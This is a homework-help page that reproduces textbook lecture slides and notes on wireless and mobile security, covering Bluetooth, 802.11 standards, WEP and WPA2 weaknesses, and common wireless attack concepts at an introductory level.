Writing Assignment #3

Jackie Channn

conklin_principlesofcomputersecurity_5e_Chap012_PPT.pptx

Home >Computer Science homework help >Writing Assignment #3

Wireless Security and Mobile Devices

Chapter 12

Principles of Computer Security, Fifth Edition

Objectives

Describe the different wireless systems in use today.

Detail WAP and its security implications.

Identify 802.11’s security issues and possible solutions.

Learn about the different types of wireless attacks.

Examine the elements needed for enterprise wireless deployment.

Examine the security of mobile systems.

Principles of Computer Security, Fifth Edition

Key Terms (1 of 4)

Beacon frames

Bluebugging

Bluejacking

Bluesnarfing

Bluetooth

Bluetooth DoS

Captive portal

Containerization

Custom firmware

Direct-sequence spread spectrum (DSSS)

Disassociation

Extensible Authentication Protocol (EAP)

EAP-FAST

EAP-TLS

EAP-TTLS

Principles of Computer Security, Fifth Edition

Beacon frames – A series of frames used in WiFi (802.11) to establish the presence of a wireless network device.

Bluebugging – The use of a Bluetooth-enabled device to eavesdrop on another person’s conversation using that person’s Bluetooth phone as a transmitter. The bluebug application silently causes a Bluetooth device to make a phone call to another device, causing the phone to act as a transmitter and allowing the listener to eavesdrop on the victim’s conversation in real time.

Bluejacking – The sending of unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones, tablets, or laptop computers.

Bluesnarfing – The unauthorized access of information from a Bluetooth-enabled device through a Bluetooth connection, often between phones, desktops, laptops, and tablets.

Bluetooth DOS – The use of Bluetooth technology to perform a denial-of-service attack against another device. In this attack, an attacker repeatedly requests pairing with the victim device. This type of attack does not divulge information or permit access, but is a nuisance. And, more importantly, if done repeatedly it can drain a device’s battery, or prevent other operations from occurring on the victim’s device.

Captive portal – A website used to validate credentials before allowing access to a network connection.

Containerization – Dividing a device into a series of containers, with one container holding work-related materials and the other personal materials.

Custom firmware - Firmware for a device that has been altered from the original factory settings.

Direct-sequence spread spectrum (DSSS) – A method of distributing a communication over multiple frequencies to avoid interference and detection.

Disassociation – An attack against a wireless system designed to disassociate a host from the wireless access point, and from the wireless network. Disassociation attacks stem from the deauthentication frame that is in the IEEE 802.11 (Wi-Fi) standard.

Extensible Authentication Protocol (EAP) – A protocol defined in RFC 2284 (obsoleted by 3748). The framework is used to secure the authentication process, not an actual encryption method. Many variants exist.

EAP-FAST – EAP–Flexible Authentication via Secure Tunneling is described in RFC-4851 and proposed by Cisco to be a replacement for LEAP, a previous Cisco version of EAP. It offers a lightweight, tunneling protocol to enable authentication. The distinguishing characteristic is the passing of a Protected Access Credential (PAC) that’s used to establish a TLS tunnel through which client credentials are verified.

EAP-TLS – An IETF open standard (RFC 5216) that uses the Transport Layer Security (TLS) protocol to secure the authentication process. This is still considered one of the most secure implementations, primarily because common implementations employ client-side certificates.

EAP-TTLS – An extension of TLS called Tunneled TLS. In EAP-TTLS, the authentication process is protected by the tunnel from man-in-the-middle attacks, and although client certificates can be used, they are not required, making this easier to set up than EAP-TLS for clients without certificates.

Key Terms (2 of 4)

Evil twin

Firmware OTA updates

Geo-tagging

IEEE 802.1X

Infrared (IR)

Initialization vector (IV)

Jailbreaking

Jamming

MAC filtering

MIMO

Mobile device management (MDM)

Multimedia Messaging Service (MMS)

Near field communication (NFC)

Orthogonal frequency division multiplexing (OFDM)

Principles of Computer Security, Fifth Edition

Evil twin – A wireless attack performed using a second, rogue wireless access point designed to mimic a real access point.

Firmware OTA updates - A solution of updating mobile device firmware without bringing the device to a central location or connection for updating.

Geo-tagging – The metadata that contains location-specific information that is attached to other data elements.

IEEE 802.1X – An IEEE standard for performing authentication over networks.

Infrared (IR) – A band of electromagnetic energy just beyond the red end of the visible color spectrum.

Initialization vector (IV) – A data value used to seed a cryptographic algorithm, providing for a measure of randomness.

Jailbreaking – The process of breaking OS security features designed to limit interactions with the OS itself. Commonly performed on mobile phones to unlock features or break locks to carriers.

Jamming – A form of denial of service, specifically against the radio spectrum aspect of wireless. Just as other DoS attacks can manipulate things behind the scenes, so can jamming on a wireless AP, enabling things such as attachment to a rogue AP.

MAC filtering – The use of layer 2 MAC addresses to filter traffic to only authorized NIC cards.

MIMO – A set of multiple-input and multiple-output antenna technologies where the available antennas are spread over a multitude of independent access points each having one or multiple antennas.

Mobile device management (MDM) – A marketing term for a collective set of commonly employed protection elements associated with mobile devices.

Multimedia Messaging Service (MMS) – A standard protocol used to send messages, including multimedia content to and from mobile devices over a cellular network.

Near field communication (NFC) – A set of standards and protocols for establishing a communication link over very short distances. Used in mobile devices.

Orthogonal frequency division multiplexing (OFDM) – Multiplexes, or separates, the data to be transmitted into smaller chunks and then transmits the chunks on several subchannels. This use of subchannels is what the “frequency division” portion of the name refers to. Both of these techniques, multiplexing and frequency division, are used to avoid interference. Orthogonal refers to the manner in which the subchannels are assigned, principally to avoid crosstalk, or interference with your own channels.

Key Terms (3 of 4)

PEAP

Radio Frequency Identification (RFID)

RC4 stream cipher

Remote wiping

Replay attack

Rogue access point

Rooting

Screen locking

Service set identifier (SSID)

Short Message Service (SMS)

Sideloading

Site survey

Storage segmentation

Principles of Computer Security, Fifth Edition

PEAP – Protected EAP, was developed to protect the EAP communication by encapsulating it with TLS. This is an open standard developed jointly by Cisco, Microsoft, and RSA. EAP was designed assuming a secure communication channel. PEAP provides that protection as part of the protocol via a TLS tunnel. PEAP is widely supported by vendors for use over wireless networks.

Radio Frequency Identification (RFID) – RFID tags are used in a wide range of use cases. From tracking devices to tracking keys, the unique serialization of these remotely sensible devices has made them useful in a wide range of applications. RFID tags come in several different forms and can be classified as either active or passive.

RC4 stream cipher – A stream cipher used in TLS and WEP.

Remote wiping – An action that typically removes data stored on the device and resets the device to factory settings.

Replay attack – An attack that occurs when the attacker captures a portion of a communication between two parties and retransmits it at a later time.

Rogue access point – An unauthorized access point inserted into a network allowing unauthorized wireless access.

Rooting – A process whereby OS controls are bypassed. This is the term frequently used for Android devices.

Screen locking – A phone’s capability whereby one must enter a passcode or PIN to unlock the device. It is highly recommended that screen locks be enforced for all mobile devices.

Service set identifier (SSID) – Identifies a specific 802.11 wireless network. It transmits information about the access point to which the wireless client is connecting.

Short Message Service (SMS) – A standard protocol used to send messages to and from mobile devices over a cellular network. SMS is limited to short text-only messages of less than 160 characters and is carried over the signaling path of the cellular network when signaling data is not being sent.

Sideloading – The process of adding apps to a mobile device without using the authorized store associated with the device.

Site survey – Involves several steps: mapping the floor plan, testing for RF interference, testing for RF coverage, and analysis of material via software.

Storage segmentation – A processes similar to containerization in that it represents a logical separation of the storage in the unit.

Key Terms (4 of 4)

Temporal Key Integrity Protocol (TKIP)

USB OTG (USB On-The-Go)

WAP gap

War-chalking

War dialing

War driving

Wi-Fi Protected Access 2 (WPA2)

WiMAX

Wired Equivalent Privacy (WEP)

Wireless Application Protocol (WAP)

Wireless Transport Layer Security (WTLS)

ZigBee

Principles of Computer Security, Fifth Edition

Temporal Key Integrity Protocol (TKIP) – A security protocol used in 802.11 wireless networks.

USB OTG (USB On-The-Go) – An extension of USB technology that facilitates direct connection between USB OTG–enabled mobile devices.

WAP gap – Refers to the confidentiality of information where the two different networks meet on the WAP gateway.

War-chalking – The act of using chalk on sidewalks to mark some of the wireless networks people have found.

War dialing – The process of dialing a list of phone numbers looking for modem-connected computers.

War driving – The act of driving around with a wireless locater program recording the number of networks found and their locations.

Wi-Fi Protected Access 2 (WPA2) – A protocol to secure wireless communications using a subset of the 802.11i standard.

WiMAX – A wireless band that refers to the set of 802.16 wireless network standards ratified by the WiMAX Forum.

Wired Equivalent Privacy (WEP) – An 802.11 protocol that uses a cipher to encrypt the data as it is transmitted through the air.

Wireless Application Protocol (WAP) – A lightweight protocol designed for mobile devices.

Wireless Transport Layer Security (WTLS) – A lightweight security protocol designed for WAP.

ZigBee – A low-power, personal area networking technology described by the IEEE 802.15.4 series.

Introduction to Wireless Networking (1 of 3)

Wireless networking is the transmission of packetized data by means of a physical topology that does not use direct physical links.

Bluetooth is a short-range wireless protocol typically used on small devices such as mobile phones.

Wireless is problematic from a security standpoint.

Wireless does away with the physical limitations.

If attacker gets close enough to signal’s source he can listen to the access point and clients talking in order to capture all the packets for examination.

Principles of Computer Security, Fifth Edition

The IEEE 802.11 protocol has been standardized by the IEEE for wireless local area networks (LANs). Three versions are currently in production—802.11g, 802.11a, and 802.11n. The latest standard is 802.11ac, but it provides backward compatibility with 802.11g hardware. Cellular phone technology has moved rapidly to embrace data transmission and the Internet.

The Wireless Application Protocol (WAP) was one of the pioneers of mobile data applications, but it has been overtaken by a variety of protocols pushing us to fourth-generation (4G) mobile networks.

Bluetooth is a short-range wireless protocol typically used on small devices such as mobile phones. Early versions of these phones also had Bluetooth on and discoverable as a default, making the compromise of a nearby phone easy. Security research has focused on finding problems with these devices simply because the devices are so common.

Introduction to Wireless Networking (2 of 3)

There are several different wireless bands in common use today.

Wi-Fi series refers to the 802.11 Wireless LAN standards certified by the Wi-Fi Alliance.

WiMAX refers to the set of 802.16 wireless network standards ratified by the WiMAX Forum.

ZigBee is a low-power, personal area networking technology described by the IEEE 802.15.4 series.

Principles of Computer Security, Fifth Edition

Tech Tip: There are several different wireless bands in common use today, the most common of which is the Wi-Fi series, referring to the 802.11 Wireless LAN standards certified by the Wi-Fi Alliance. Another set of bands is WiMAX, which refers to the set of 802.16 wireless network standards ratified by the WiMAX Forum. Lastly, there is ZigBee, a lowpower, personal area networking technology described by the IEEE 802.15.4 series.

Introduction to Wireless Networking (3 of 3)

Figure 12.1 Wireless transmission extending beyond the facility’s walls

Principles of Computer Security, Fifth Edition

If an attacker can get close enough to the signal’s source as it is being broadcast, he can at the very least listen to the access point and clients talking to capture all the packets for examination, as depicted in this figure.

Attackers can also try to modify the traffic being sent or try to send their own traffic to disrupt the system. In this chapter, you will learn about the different types of attacks that wireless networks face.

Mobile Phones (1 of 2)

Today’s smartphones support multiple wireless data access methods.

This includes 802.11, Bluetooth, and cellular.

The Wireless Application Protocol (WAP) attempted to satisfy the needs for more data on mobile devices, but it is falling by the wayside as the mobile network capabilities increase.

The need for more and more bandwidth has pushed carriers to adopt a more IP-centric routing methodology.

Principles of Computer Security, Fifth Edition

The need for more and more bandwidth has pushed carriers to adopt a more IP-centric routing methodology with technologies such as High Speed Packet Access (HSPA) and Evolution Data Optimized (EVDO). Mobile phones have ruthlessly advanced with new technologies and services, causing phones and the carrier networks that support them to be described in generations—1G, 2G, 3G, and 4G. 1G refers to the original analog cellular standard, Advanced Mobile Phone System (AMPS). 2G refers to the digital network that superseded it. 3G is the system of mobile networks that followed, with many different implementations carrying data at up to 400 Kbps. 4G represents the current state of mobile phones with LTE being the primary method. 4G allows carriers to offer a wider array of services to the consumer, including broadband data service up to 14.4 Mbps and video calling. 4G is also a move to an entirely IP-based network for all services, running voice over IP (VoIP) on your mobile phone and speeds up to 1 Gbps.

All of these “gee-whiz” features are nice, but how secure are your bits and bytes going to be when they’re traveling across a mobile carrier’s network? All the protocols mentioned have their own security implementations—WAP applies its own Wireless Transport Layer Security (WTLS) to attempt to secure data transmissions, but WAP still has issues such as the “WAP gap” (as discussed next). 3G networks have attempted to push a large amount of security down the stack and rely on the encryption designed into the wireless protocol.

Mobile Phones (2 of 2)

Early cell phones just allowed you to make calls.

Today’s phones allow you to carry computers in your pocket.

Principles of Computer Security, Fifth Edition

When cellular phones first hit the market, security wasn’t an issue—if you wanted to keep your phone safe, you’d simply keep it physically secure and not loan it to people you didn’t want making calls. Its only function was that of a telephone.

The advance of digital circuitry has added amazing power in smaller and smaller devices, causing security to be an issue as the software becomes more and more complicated. Today’s small and inexpensive products have made the wireless market grow by leaps and bounds, as traditional wireless devices such as cellular phones and pagers have been replaced by tablets and smartphones.

Wireless Application Protocol (1 of 5)

WAP was introduced to compensate for the relatively low amount of computing power on handheld devices as well as the generally poor network throughput of cellular networks.

Wireless Transport Layer Security (WTLS) encryption scheme encrypts the plaintext data and then sends it over the airwaves as ciphertext.

The originator and the recipient both have keys to decrypt the data and reproduce the plaintext.

Principles of Computer Security, Fifth Edition

Wireless Application Protocol (2 of 5)

WTLS uses a modified version of the Transport Layer Security (TLS) protocol.

WTLS supports several bulk encryption algorithms.

WTLS implements integrity through the use of message authentication codes (MACs).

The TLS protocol that WTLS is based on is designed around Internet-based computers.

WTLS must cope with small amounts of memory and limited processor capacity.

Principles of Computer Security, Fifth Edition

Wireless Application Protocol (3 of 5)

The WTLS protocol is designed around more capable servers than devices and can allow connections with little to no security.

Clients with low memory or CPU capabilities cannot support encryption which greatly reduces confidentiality.

Authentication is optional and omitting it leaves the connection vulnerable to a man-in-the-middle–type attack.

General flaws in the protocol’s implementation exist.

Known security vulnerabilities include the chosen plaintext attack, the PKCS #1 attack, and the alert message truncation attack.

Principles of Computer Security, Fifth Edition

Wireless Application Protocol (4 of 5)

The chosen-plaintext attack works on the principle of a predictable initialization vector (IV).

Concern over the WAP gap involves confidentiality of information where the two different networks meet the WAP gateway.

WTLS acts as the security protocol for the WAP network, and TLS is the standard for the Internet.

The WAP gateway has to perform translation from one encryption standard to the other.

Principles of Computer Security, Fifth Edition

Wireless Application Protocol (5 of 5)

Figure 12.2 The WAP gap shows an unencrypted space between two enciphered connections.

Principles of Computer Security, Fifth Edition

Some concern over the so-called WAP gap involves confidentiality of information where the two different networks meet, the WAP gateway, as shown in this figure.

3G Mobile Networks

Several competing data transmission standards, such as HSPA and EVDO, exist for 3G networks.

All standards include transport layer encryption protocols to secure the voice traffic traveling across the wireless signal as well as the data sent by the device.

KASUMI is the proposed 3G cryptographic standard.

This modified version of the MISTY1 algorithm uses 64-bit blocks and 128-bit keys.

Multiple attacks have been launched against this cipher.

Principles of Computer Security, Fifth Edition

Our cell phones are one of the most visible indicators of advancing technology. Within recent memory, we were forced to switch from old analog phones to digital models. The networks have been upgraded to 3G, greatly enhancing speed and lowering latency. This has reduced the need for lightweight protocols to handle data transmission, and more standard protocols such as IP can be used. The increased power and memory of the handheld devices also reduce the need for lighter-weight encryption protocols. This has caused the protocols used for 3G mobile devices to build in their own encryption protocols. Security will rely on these lower-level protocols or standard application-level security protocols used in normal IP traffic.

Multiple attacks have been launched against this cipher. While the attacks tend to be impractical, this shows that application layer security is needed for secure transmission of data on mobile devices. WAP and WTLS can be used over the lower-level protocols, but traditional TLS can also be used.

4G Mobile Networks

4G can support high-quality VoIP connections, video calls, and real-time video streaming.

True 4G would require a firm to meet all of the technical standards issued by the ITU, including specifications that apply to the tower side of the system.

Most 4G deployments are continuations of technologies already deployed—just newer evolutions of standards.

Principles of Computer Security, Fifth Edition

Just as the mobile network carriers were finishing the rollout of 3G services, 4G networks appeared on the horizon. The desire for anywhere, anytime Internet connectivity at speeds near that of a wired connection drives deployment of these next-generation services. 4G can support high-quality VoIP connections, video calls, and real-time video streaming. Just as 3G had some intermediaries that were considered 2.9G, LTE and WiMAX networks are sometimes referred to as 3.5G, 3.75G, or 3.9G. The carriers are marketing these new networks as 4G, although they do not adhere to the ITU standards for 4G speeds.

Some of the 4G requirements are:

Be based on an all-IP packet switched network

Offer high quality of service for next-generation multimedia support

Smooth handovers across heterogeneous networks

Peak data rates of up to approximately 100 Mbps for high mobility (mobile access)

Peak data rates of up to approximately 1 Gbps for low mobility such as nomadic/local wireless access

Dynamically share and use the network resources to support more simultaneous users per cell

Use scalable channel bandwidths of 5–20 MHz, optionally up to 40 MHz

Peak link spectral efficiency of 15-bps/Hz in the downlink, and 6.75-bps/Hz in the uplink

To achieve these and other technical elements requires specific tower-side equipment as well as handset specifications. Different carriers have chosen different sets of these to include in their offerings, each building upon their existing networks and existing technologies.

Most 4G deployments are continuations of technologies already deployed—just newer evolutions of standards. This is how LTE, LTE Advanced, WiMAX, and WiMAX 2 were born. LTE and WiMAX series come from separate roots, and are not interchangeable. Within the families, interoperability is possible and is dependent upon carrier implementation.

SATCOM

SATCOM (Satellite Communications) is the use of terrestrial transmitters and receivers and satellites in orbit to transfer the signals.

SATCOM can be one way, as in satellite radio, but for most communications two-way signals are needed.

In high-density urban areas

Cost and line-of-sight issues make SATCOM a costly option.

In rural areas or remote areas, or mobile areas such as at sea

SATCOM is one of the only options for communications.

Principles of Computer Security, Fifth Edition

Bluetooth (1 of 3)

Bluetooth is a short-range (approx. 32 feet), low-power wireless protocol transmitting in the 2.4 GHz band.

Bluetooth transmits data in Personal Area Networks (PANs) through mobile phones, laptops, printers, and audio devices.

Version 1.2 allows speeds up to 721 Kbps and improves resistance to interference over version 1.1.

Bluetooth 2.0 introduced enhanced data rate (EDR), which allows the transmission of up to 3.0 Mbps.

Principles of Computer Security, Fifth Edition

Bluetooth was originally developed by Ericsson and known as multi-communicator link; in 1998, Nokia, IBM, Intel, and Toshiba joined Ericsson and adopted the Bluetooth name. This consortium became known as the Bluetooth Special Interest Group (SIG). The SIG now has more than 24,000 members and drives the development of the technology and controls the specification to ensure interoperability.

Most people are familiar with Bluetooth as it is part of many mobile phones and headsets, such as those shown in Figure 12.3. This short-range, low-power wireless protocol transmits in the 2.4 GHz band, the same band used for 802.11. The concept for the short-range (approx. 32 feet) wireless protocol is to transmit data in personal area networks (PANs).

Bluetooth transmits and receives data from a variety of devices, the most common being mobile phones, laptops, printers, and audio devices. The mobile phone has driven a lot of Bluetooth growth and has even spread Bluetooth into new cars as a mobile phone hands-free kit.

Bluetooth has gone through a few releases. Version 1.1 was the first commercially successful version, with version 1.2 released in 2007 and correcting some of the problems found in 1.1. Version 1.2 allows speeds up to 721 Kbps and improves resistance to interference. Version 1.2 is backward-compatible with version 1.1. With the rate of advancement and the life of most tech items, Bluetooth 1 series is basically extinct. Bluetooth 2.0 introduced enhanced data rate (EDR), which allows the transmission of up to 3.0 Mbps. Bluetooth 3.0 has the capability to use an 802.11 channel to achieve speeds up to 24 Mbps. The current version is the Bluetooth 4.0 standard with support for three modes: classic, high speed, and low energy.

Bluetooth 4 introduces a new method to support collecting data from devices that generate data at a very low rate. Some devices, such as medical devices, may only collect and transmit data at low rates. This feature, called Low Energy (LE), was designed to aggregate data from various sensors, like heart rate monitors, thermometers, and so forth, and carries the commercial name Bluetooth Smart.

As Bluetooth became popular, people started trying to find holes in it.

Bluetooth features easy configuration of devices to allow communication, with no need for network addresses or ports. Bluetooth uses pairing to establish a trust relationship between devices. To establish that trust, the devices advertise capabilities and require a passkey. To help maintain security, most devices require the passkey to be entered into both devices; this prevents a default passkey–type attack. The Bluetooth’s protocol advertisement of services and pairing properties is where some of the security issues start.

Bluetooth (2 of 3)

Figure 12.3 Headsets and cell phones are two of the most popular types of Bluetooth-capable devices.

Principles of Computer Security, Fifth Edition

Most people are familiar with Bluetooth as it is part of many mobile phones and headsets, such as those shown in this figure.

Bluetooth (3 of 3)

Bluetooth 3.0 has the capability to use an 802.11 channel to achieve speeds up to 24 Mbps.

Bluetooth 4.0 standard with support for three modes: classic, high speed, and low energy.

Bluetooth 4 introduces a new method to support collecting data from devices that generate data at a very low rate.

Bluetooth features easy configuration of devices to allow communication, with no need for network addresses or ports.

Principles of Computer Security, Fifth Edition

Bluetooth Attacks

Bluetooth is open to connection and attack from outside the intended sender and receiver.

Several different attack modes have been discovered that can be used against Bluetooth systems.

Software and protocol updates have helped to improve the security of the protocol.

Almost all phones now keep Bluetooth turned off by default, and they allow you to make the phone discoverable for only a limited amount of time.

Principles of Computer Security, Fifth Edition

Near Field Communication

Near field communication (NFC) is a set of wireless technologies.

NFC enables smartphones and other devices to establish radio communication over a short proximity, typically a distance of 10 cm (3.9 in) or less.

This technology did not see much use until recently when it started being employed to move data between cell phones and in mobile payment systems.

NFC is likely to become a high use technology in the years to come.

Principles of Computer Security, Fifth Edition

NFC is likely to become a high use technology in the years to come as multiple uses exist for the technology, and the next generation of smartphones is surely to see this as a standard function.

ANT

A multicast wireless sensor network technology that operates in the 2.4-GHz ISM band.

ANT is a proprietary method but has open access and a protocol stack to facilitate communication.

ANT is conceptually similar to Bluetooth LE

ANT is oriented toward usage with sensors, such as heart rate monitors, fitness devices, and personal devices.

ANT uses a unique isosynchronous network technology.

Principles of Computer Security, Fifth Edition

Infrared

A band of electromagnetic energy just beyond the red end of the visible color spectrum.

IR made its debut in computer networking as a wireless method to connect to printers.

Now that wireless keyboards, wireless mice, and mobile devices exchange data via IR, it seems to be everywhere.

IR cannot penetrate walls but bounces off them.

IR cannot penetrate other solid objects.

Items stacked in front of transceiver cause signal loss.

Principles of Computer Security, Fifth Edition

USB

The ubiquitous standard for connecting devices with cables.

USB ports have greatly expanded users’ ability to connect devices to their computers.

USB ports automatically recognize a device being plugged into the system and usually work without the user needing to add drivers or configure software.

Virtually anything that can consume or deliver data connects via USB.

USB drive keys: flash memory with a USB interface.

Principles of Computer Security, Fifth Edition

IEEE 802.11 Series

802.11 was a new standard for sending packetized data traffic over radio waves in the unlicensed 2.4 GHz band.

This group of IEEE standards is also called Wi-Fi.

A device marked as Wi-Fi Certified adheres to the standards of the Wi-Fi alliance.

Direct-sequence spread spectrum (DSSS)

A modulation type that spreads the traffic sent over the entire bandwidth.

Orthogonal frequency division multiplexing (OFDM)

Principles of Computer Security, Fifth Edition

Features of 802.11b and 802.11a were later joined to create 802.11g, an updated standard that allows the faster speeds of the 5 GHz specification on the 2.4 GHz band. Security problems were discovered in the implementations of these early wireless standards, principally involving the Wired Equivalent Privacy (WEP) protocol. These problems included an attacker’s ability to break the cryptography and monitor other users’ traffic. The security problems in WEP were a top concern until the adoption of 802.11i-compliant products enhanced the security with Wi-Fi Protected Access (WPA), discussed later in the chapter. 802.11ac is the latest standard; it focuses on achieving much higher speeds for wireless networks.

802.11: Individual Standards (1 of 4)

The 802.11b protocol provides for multiple-rate Ethernet over 2.4 GHz spread-spectrum wireless.

Most common layout is a point-to-multipoint environment.

802.11a uses a higher band and has higher bandwidth.

It operates in the 5 GHz spectrum using OFDM and supports rates of up to 54 Mbps.

The higher frequency shortens the usable range

The 802.11g standard uses portions of both 802.11a and 802.11b.

Principles of Computer Security, Fifth Edition

The 802.11b protocol provides for multiple-rate Ethernet over 2.4 GHz spread-spectrum wireless. It provides transfer rates of 1 Mbps, 2 Mbps, 5.5 Mbps, and 11 Mbps and uses DSSS. The most common layout is a point-to-multipoint environment, with the available bandwidth being shared by all users. Typical range is roughly 100 yards indoors and 300 yards outdoors, line of sight. While the wireless transmissions of 802.11 can penetrate some walls and other objects, the best range is offered when both the access point and network client devices have an unobstructed view of each other.

802.11a uses a higher band and has higher bandwidth. It operates in the 5 GHz spectrum using OFDM. Supporting rates of up to 54 Mbps, it is the faster brother of 802.11b; however, the higher frequency used by 802.11a shortens the usable range of the devices and makes it incompatible with 802.11b. The chipsets tend to be more expensive for 802.11a, which has slowed adoption of the standard.

802.11: Individual Standards (2 of 4)

All these protocols operate in bands that are “unlicensed” by the FCC.

The 802.11 standard includes attempts at rudimentary authentication and confidentiality controls.

Authentication is handled in its most basic form by the 802.11 access point (AP), forcing the clients to perform a handshake when attempting to “associate” to the AP.

Association is the process required before the AP will allow the client to talk across the AP to the network.

Principles of Computer Security, Fifth Edition

The 802.11g standard uses portions of both of the other standards: it uses the 2.4 GHz band for greater range but uses the OFDM transmission method to achieve the faster 54 Mbps data rates. As it uses the 2.4 GHz band, this standard interoperates with the older 802.11b standard. This allows an 802.11g access point (AP) to give access to both “G” and “B” clients.

The 802.11n version improves on the older standards by greatly increasing speed. It has a functional data rate of up to 600 Mbps, gained through the use of wider bands and multiple-input multiple-output (MIMO) processing. MIMO uses multiple antennas and can bond separate channels together to increase data throughput.

802.11ac is the latest in the 5 GHz band, with functional data rates up to a theoretical 6+ Gbps using multiple antennas. The 802.11ac standard was ratified in 2014, and chipsets have been available since late 2011. Designed for multimedia streaming and other high-bandwidth operations, the individual channels are twice the width of 802.11n channels, and as many as eight antennas can be deployed in a Mu-MIMO form.

802.11: Individual Standards (3 of 4)

Association occurs only if the client has all the correct parameters needed in the handshake, among them the service set identifier (SSID).

The SSID is a phrase-based mechanism that helps ensure that you are connecting to the correct AP.

This SSID phrase is transmitted in all the access point’s beacon frames.

It is an 802.11 management frame for the network.

Principles of Computer Security, Fifth Edition

All these protocols operate in bands that are “unlicensed” by the FCC. This means that people operating this equipment do not have to be certified by the FCC, but it also means that the devices could possibly share the band with other devices, such as cordless phones, closed-circuit TV (CCTV) wireless transceivers, and other similar equipment. This other equipment can cause interference with the 802.11 equipment, possibly causing speed degradation.

The 802.11 protocol designers expected some security concerns and attempted to build provisions into the 802.11 protocol that would ensure adequate security. The 802.11 standard includes attempts at rudimentary authentication and confidentiality controls. Authentication is handled in its most basic form by the 802.11 AP, forcing the clients to perform a handshake when attempting to “associate” to the AP.

802.11: Individual Standards (4 of 4)

Typically, access to actual Ethernet segments is protected by physical security measures.

A typical wireless installation broadcasts the network right through the physical controls that are in place.

Principles of Computer Security, Fifth Edition

Attacking 802.11 (1 of 4)

Wireless is a popular target for several reasons:

Access gained from wireless

Lack of default security

Wide proliferation of devices

Anonymity

Low cost of the equipment needed

Principles of Computer Security, Fifth Edition

Wireless is a popular target for several reasons: the access gained from wireless, the lack of default security, and the wide proliferation of devices.

However, other reasons also make it attackable. The first of these is anonymity: An attacker can probe your building for wireless access from the street. Then he can log packets to and from the AP without giving any indication that an attempted intrusion is taking place. The attacker will announce his presence only if he attempts to associate to the AP. Even then, an attempted association is recorded only by the MAC address of the wireless card associating to it, and most APs do not have alerting functionality to indicate when users associate to it. This fact gives administrators a very limited view of who is gaining access to the network, if they are even paying attention at all. It gives attackers the ability to seek out and compromise wireless networks with relative impunity.

The second reason is the low cost of the equipment needed. A single wireless access card costing less than $100 can give access to any unsecured AP within driving range. Finally, attacking a wireless network is relatively easy compared to attacking other target hosts. Windows-based tools for locating and sniffing wireless-based networks have turned anyone who can download files from the Internet and has a wireless card into a potential attacker.

Attacking 802.11 (2 of 4)

Locating wireless networks was originally termed war-driving an adaptation of the term war-dialing.

War-dialing is the process of dialing a list of phone numbers looking for modem-connected computers.

War-drivers drive around with a wireless locater program recording the number of networks found and their locations.

War-chalking started with people using chalk on sidewalks to mark some of the wireless networks they found.

Principles of Computer Security, Fifth Edition

Locating wireless networks was originally termed war-driving, an adaptation of the term war-dialing. War-dialing comes from the 1983 movie WarGames; it is the process of dialing a list of phone numbers looking for modem-connected computers. War-drivers drive around with a wireless locater program recording the number of networks found and their locations. This term has evolved along with war-flying and war-walking, which mean exactly what you expect. War-chalking started with people using chalk on sidewalks to mark some of the wireless networks they found.

Attacking 802.11 (3 of 4)

The most common tools for an attacker to use are reception-based programs that listen to the beacon frames output by other wireless devices, and programs that promiscuously capture all traffic.

One of the more commonly used tools is Wireshark.

Other common tools include Aircrack-ng suite, Kismet, NetSurveyor, Vistumbler, and NetSpot.

Principles of Computer Security, Fifth Edition

Attacking 802.11 (4 of 4)

Once an attacker has located a network, and assuming they cannot directly connect and start active scanning and penetration of the network, the attacker will use the best attack tool there is: a network sniffer.

Popular wireless sniffers are Wireshark and Kismet.

After the limited security functions of a wireless network are broken, the network behaves exactly like a regular Ethernet network and is subject to the exact same vulnerabilities.

Principles of Computer Security, Fifth Edition

WEP (1 of 2)

Wired Equivalent Privacy (WEP) uses a cipher to encrypt the data as it is transmitted through the air.

WEP encrypts the data traveling across the network with an RC4 stream cipher, attempting to ensure confidentiality.

WEP supports two key lengths typically referred to as 64 and 128 bits.

Principles of Computer Security, Fifth Edition

WEP (2 of 2)

Manufactures use 152-bit WEP keys.

In all cases, 24 bits of the overall key length are used for the initialization vector (IV).

Biggest weakness of WEP:

IV problem exists regardless of key length

IV always remains at 24 bits, and IVs can frequently be repeated due to the limited size.

Most APs have the ability to lock in access only to known MAC addresses, providing a limited authentication capability.

Principles of Computer Security, Fifth Edition

Current Security Methods (1 of 7)

The Wi-Fi Alliance developed Wi-Fi Protected Access (WPA) to improve upon WEP.

The 802.11i standard is the IEEE standard for security in wireless networks.

Also known as Wi-Fi Protected Access 2 (WPA2).

Uses 802.1X to provide authentication

Can use Advanced Encryption Standard (AES) as the encryption protocol

Uses the Temporal Key Integrity Protocol (TKIP)

Uses AES with the Counter Mode with CBC-MAC Protocol

Principles of Computer Security, Fifth Edition

Current Security Methods (2 of 7)

TKIP works by using a shared secret combined with the card’s MAC address.

A new key is generated and mixed with the IV to make per-packet keys that encrypt a single packet using the same RC4 cipher used by traditional WEP.

CCMP is actually the mode in which the AES cipher is used to provide message integrity.

CCMP requires new hardware to perform the AES encryption.

802.11i corrects the weaknesses of WEP.

Principles of Computer Security, Fifth Edition

Current Security Methods (3 of 7)

WPA uses the flawed WEP algorithm with the Temporal Key Integrity Protocol (TKIP).

TKIP employs a per-packet key, generating a new 128-bit key for each packet.

Temporal Key Integrity Protocol (TKIP) was created as a stopgap security measure to replace WEP.

Did not require the replacement of legacy hardware

Mixes a secret root key with the IV before RC4 encryption

Vulnerable to a number of similar WEP attacks

No longer considered secure

Principles of Computer Security, Fifth Edition

Current Security Methods (4 of 7)

IEEE 802.11i is the standard for security in wireless networks and is also known as Wi-Fi Protected Access 2 (WPA2).

Uses 802.1x to provide authentication and uses the Advanced Encryption Standard (AES) for encryption

Uses the AES block cipher

Wi-Fi Protected Setup (WPS) provides an easy method of configuring wireless networks.

WPS uses an eight-digit PIN to configure wireless devices.

It is susceptible to a brute-force attack.

Principles of Computer Security, Fifth Edition

Current Security Methods (5 of 7)

Steps in setting Up WPA2 are:

First choose a security framework

When configuring an adapter to connect to an existing network, you need to match the choice of the network.

For security purposes, you should choose WPA2-Personal or WPA2-Enterprise.

Choose AES encryption

Choose the network security key

Principles of Computer Security, Fifth Edition

